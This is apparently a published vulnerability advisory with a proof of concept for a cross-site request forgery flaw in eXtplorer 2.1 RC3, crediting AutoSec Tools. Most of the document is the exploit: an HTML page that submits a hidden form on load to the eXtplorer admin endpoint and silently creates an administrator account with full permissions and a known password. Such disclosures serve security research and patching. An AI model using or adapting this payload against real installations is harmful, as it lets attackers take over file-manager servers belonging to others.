A cross site request forgery vulnerability in eXtplorer version 2.1 RC3 can be exploited to create a new admin.
73510bbcc0b1f03a41a02a1a718641f2649cc998082d27d2a801818d516a1fff
<!------------------------------------------------------------------------
# Software................eXtplorer 2.1 RC3
# Vulnerability...........Cross-site Request Forgery
# Threat Level............Low (1/5)
# Download................http://extplorer.sourceforge.net/
# Discovery Date..........4/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A cross-site request forgery vulnerability in eXtplorer 2.1 RC3 can be
# exploited to create a new admin.
#
#
# --PoC-->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/extplorer/index.php">
<input type="hidden" name="option" value="com_extplorer" />
<input type="hidden" name="user" value="" />
<input type="hidden" name="action" value="admin" />
<input type="hidden" name="action2" value="adduser" />
<input type="hidden" name="confirm" value="true" />
<input type="hidden" name="nuser" value="new_admin" />
<input type="hidden" name="pass1" value="Password1" />
<input type="hidden" name="pass2" value="Password1" />
<input type="hidden" name="home_dir" value="c:/" />
<input type="hidden" name="home_url" value="http://localhost" />
<input type="hidden" name="show_hidden" value="1" />
<input type="hidden" name="no_access" value="" />
<input type="hidden" name="permissions" value="7" />
<input type="hidden" name="active" value="1" />
</form>
</body>
</html>